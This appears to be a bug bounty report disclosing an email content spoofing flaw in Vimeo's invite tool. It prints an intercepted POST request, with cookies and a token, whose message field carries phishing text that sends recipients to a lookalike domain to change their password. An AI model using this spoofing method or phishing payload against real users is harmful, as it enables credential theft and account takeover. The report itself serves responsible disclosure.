May cause account take over (Via invitation page)

Hello Vimeo Security Team, I just found issue on vimeo.com/tools/invite that may put our vimeo users in riks and here is the details. ###Problem: All Email Content Spoofing ###How to reproduce: 1- Go to user settings and change the username to be something like this "Urgent From Vimeo Security Team". 2- Go to vimeo.com/tools/invite to invite a user and you can intercept the request to change it to be like this: POST /tools/invite HTTP/1.1 Host: vimeo.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://vimeo.com/tools/invite Cookie: player="captions=null"; vuid=2009949203.1404465806; __utma=18302654.1979616921.1420532449.1424956872.1428958547.6; __utmz=18302654.1423884084.3.2.utmcsr=email|utmccn=1091|utmcmd=vimeo-intro-welcome-20130100; __utmv=18302654.|2=user_type=basic=1^3=ms=0=1^7=video_count=0=1^10=vuid=2009949203.1404465806=1; __gads=ID=6e8556afd7bc6f18:T=1420532461:S=ALNI_MZlI7Y3iLF8aPnQNMMzpukv1xZwPw; optimizelySegments=%7B%22198520930%22%3A%22direct%22%2C%22213082152%22%3A%22none%22%2C%22199004622%22%3A%22ff%22%2C%22222271074%22%3A%22true%22%2C%22199138489%22%3A%22false%22%2C%22264591493%22%3A%22true%22%7D; optimizelyEndUserId=oeu1423883101455r0.7238007277799179; optimizelyBuckets=%7B%7D; ki_t=1423883326224%3B1423883326224%3B1423883326224%3B1%3B1; ki_r=; site_settings=%7B%22sticky_page%22%3Anull%7D; has_logged_in=1; stats_start_date=2015%2F02%2F10; stats_end_date=2015%2F02%2F14; language=en; __utmb=18302654.18.9.1428958926842; __utmc=18302654; vimeo=epkrdstkmk70pcdxm2tmt9t7jpcdxm2tmt9t7%2Cpm2dvrr0vwt2cdmw0s5xwcdmuuwccvumvscrmuxu2; vimeo_player=eypkrdstkmk70pcdxm2tmt9t7jpcdxm2tmt9t7%2Cp0c02wsvckkcmrcxcts2r5tsf0tsrkxs9992t0d0d; xsrft=d47046ffac2d14e4a406fd64cf6c6994.20fe1a8cf2bf627517050c395e09eb54 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 636 email_0=dia2diab%40yandex.com&message=This is Urgent event from vimeo security team, out web site has been hacked from bad guys, to be safe please visit this page http://fake-vimeo.com and change your password....Thank you our clients&send_invite=Send+This+Invite&token=d47046ffac2d14e4a406fd64cf6c6994.20fe1a8cf2bf627517050c395e09eb54 and as you can see you can change the message of the content of invitation email and you can put another links out of vimeo.com ###Impacts: Because users trust in your services, and the victim will get this email like the attached ScreenShot from "[email protected]", he will interact with it and this lead attacker to take over vimeo users accounts. Attacker can change two things now: 1- email title using his username. 2- email content. For more information i am here Thank you